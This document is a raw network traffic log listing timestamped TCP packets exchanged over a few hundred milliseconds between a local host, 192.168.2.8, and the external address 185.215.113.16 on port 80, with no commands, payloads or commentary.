Dec 26, 2024 14:14:54.427931070 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.428066015 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.428659916 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.428669930 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.428682089 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.428709984 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.428724051 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.428792953 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.429406881 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.429464102 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.429474115 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.429513931 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.429596901 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.430532932 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.430583954 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.430591106 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.430603027 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.430629969 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.430717945 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.431571960 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.431591034 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.431602001 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.431622982 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.431639910 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.431695938 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.432406902 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.432470083 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.432481050 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.432523966 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.432534933 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.433074951 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.433125973 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.456948042 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.457025051 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.457035065 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.457099915 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.457140923 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.457274914 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.457324982 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.457345963 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.457356930 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.457387924 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.624174118 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.624190092 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.624203920 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.624268055 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.624288082 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.624398947 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.624524117 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.624583006 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.624596119 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.624624014 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.624876022 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.624957085 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.624969959 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.624980927 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.625005007 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.625029087 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.625576019 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.625622034 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.625633955 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.625658989 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.625684023 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.625730038 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.626363993 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.626408100 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.626449108 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.626461983 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.626498938 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.626523972 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.627125978 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.627202034 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.627213001 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.627252102 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.627289057 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.627958059 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.627976894 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.627988100 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.628000021 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.628040075 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.628061056 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.628763914 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.628803015 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.628807068 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.628813028 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.628848076 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.628885984 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.629530907 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.629616976 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.629626989 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.629663944 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.629719019 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.630341053 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.630357981 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.630368948 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.630388021 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.630404949 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.630469084 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.631088018 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.631155968 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.631167889 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.631196022 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.631220102 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.631223917 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.631915092 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.632009029 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.632019043 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.632046938 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.632065058 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.632091045 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.632697105 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.632747889 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.632782936 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.632796049 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.632831097 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.632958889 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.633471012 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.633522987 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.633533955 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.633565903 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.633580923 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.633604050 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.634313107 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.634377956 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.634409904 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.634419918 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.634453058 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.634469986 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.635113001 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.635159969 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.635170937 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.635204077 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.635267019 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.635895967 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.635965109 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.635973930 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.636007071 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.636008024 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.636030912 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.636673927 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.636728048 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.636738062 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.636773109 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.636817932 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.637474060 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.637511969 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.637515068 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.637528896 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.637568951 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.637604952 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.638293982 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.638345003 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.638356924 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.638375998 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.638411045 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.638433933 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.639059067 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.639107943 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.639111996 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.639125109 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.639169931 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.639208078 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.639868975 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.639928102 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.639939070 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.639975071 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.640044928 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.640611887 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.640649080 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.640660048 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.640692949 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.640734911 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.641441107 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.641463995 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.641474962 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.641489983 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.641524076 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.641587973 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.642244101 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.642287016 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.642322063 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.642333984 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.642366886 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.642366886 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.642993927 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.643788099 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.667697906 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.667916059 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.667926073 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.667937040 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.667964935 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.668004990 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.668011904 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.668032885 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.668042898 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.668068886 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.713242054 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.834768057 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.834794998 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.834805965 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.834892035 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.835293055 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.835347891 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.835414886 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.835539103 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.835550070 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.835586071 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.835978031 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.836103916 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.836113930 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.836154938 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.836240053 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.836983919 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.836993933 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.837003946 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.837039948 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.837057114 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.837153912 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.837743044 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.837754011 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.837764978 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.837774992 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.837800026 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.837830067 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.838315964 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.838371992 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.838453054 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.838464022 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.838501930 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.838598013 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.839134932 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.839181900 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.839287043 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.839298010 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.839309931 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.839334965 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.839879990 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.839890003 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.839900970 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.839936972 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.840050936 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.840699911 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.840709925 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.840720892 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.840730906 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.840747118 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.840779066 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.841448069 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.841459990 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.841470957 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.841506958 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.841525078 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.841799021 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.842247963 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.842257977 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.842264891 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.842413902 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.842420101 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.843023062 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.843034029 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.843080044 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.843170881 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.843183041 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.843220949 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.843787909 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.843866110 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.843914986 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.844042063 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.844053984 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.844082117 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.844690084 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.844702005 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.844757080 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.844836950 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.844880104 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.844990969 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.845405102 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.845416069 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.845427036 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.845448971 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.845478058 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.845546961 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.846179008 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.846234083 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.846324921 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.846337080 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.846370935 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.846461058 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.847064018 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.847073078 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.847083092 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.847122908 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.847137928 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.847208977 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.847817898 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.847827911 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.847837925 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.847870111 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.847888947 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.848016024 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.848556995 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.848567009 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.848599911 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.848706007 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.848717928 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.848766088 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.849483013 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.849493980 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.849503994 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.849514961 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.849539995 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.849558115 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.850215912 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.850227118 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.850235939 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.850280046 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.850307941 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.850369930 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.851155996 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.851166010 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.851176023 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.851188898 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.851205111 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.851233959 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.851778030 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.851792097 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.851800919 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.851810932 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.851825953 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.851845026 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.852531910 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.852546930 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.852585077 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.852669001 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.852705956 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:54.852919102 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.853329897 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.853339911 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.853351116 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:54.853374004 CET	49715	80	192.168.2.8	185.215.113.16
